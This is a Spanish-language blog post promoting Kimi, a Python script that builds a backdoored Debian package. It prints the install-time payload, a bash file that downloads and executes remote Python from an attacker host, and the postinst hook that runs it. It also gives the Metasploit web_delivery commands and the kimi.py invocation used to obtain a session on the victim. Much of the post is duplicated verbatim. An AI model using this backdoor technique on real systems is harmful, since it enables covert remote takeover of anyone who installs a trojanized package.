Kimi es un sencillo script escrito en Python para crear un paquete Debian que activará un backdoor en el mismo momento en que la víctima intente instalarlo.
Lo que hace es desplegar un fichero bash en el directorio “/usr/local/bin/”:
#!/bin/bash
python -c "import urllib2; r = urllib2.urlopen('http://192.168.0.102:8080/SecPatch'); exec(r.read());"
que se ejecutará inmediatamente al ser llamado mediante el fichero postinst:
#!/bin/bash
chmod 2755 /usr/local/bin/prueba && /usr/local/bin/prueba
Como veis, la llamada es hacia la máquina del atacante que hospeda un payload, que previamente generó un servidor mediante el módulo Web Delivery de Metasploit
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit
y generó el payload malicioso con:
sudo python kimi.py -n prueba -l 192.168.0.102 -V 1.0
Finalmente como podéis ver en la siguiente imagen, al instalar el paquete, el atacante obtendrá una sesión sobre la máquina de la víctima:
El proyecto fue hecho para integrarse con Venom Shellcode Generator 1.0.13, pero puede usarse de forma independiente y puede adaptarse para que funcione fácilmente con otro generador de payloads.
Se ha probado en:
- Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
- ParrotOS (Debian Jessie)
- Kali Rolling 2.0
Proyecto: https://github.com/ChaitanyaHaritash/kimi
Lo que hace es desplegar un fichero bash en el directorio “/usr/local/bin/”:
#!/bin/bash
python -c "import urllib2; r = urllib2.urlopen('http://192.168.0.102:8080/SecPatch'); exec(r.read());"
que se ejecutará inmediatamente al ser llamado mediante el fichero postinst:
#!/bin/bash
chmod 2755 /usr/local/bin/prueba && /usr/local/bin/prueba
Como veis, la llamada es hacia la máquina del atacante que hospeda un payload, que previamente generó un servidor mediante el módulo Web Delivery de Metasploit
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit
y generó el payload malicioso con:
sudo python kimi.py -n prueba -l 192.168.0.102 -V 1.0
Finalmente como podéis ver en la siguiente imagen, al instalar el paquete, el atacante obtendrá una sesión sobre la máquina de la víctima:
El proyecto fue hecho para integrarse con Venom Shellcode Generator 1.0.13, pero puede usarse de forma independiente y puede adaptarse para que funcione fácilmente con otro generador de payloads.
Se ha probado en:
- Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
- ParrotOS (Debian Jessie)
- Kali Rolling 2.0
El nombre de la tool proviene de Kimimaro de la serie Naruto |
Comentarios
Publicar un comentario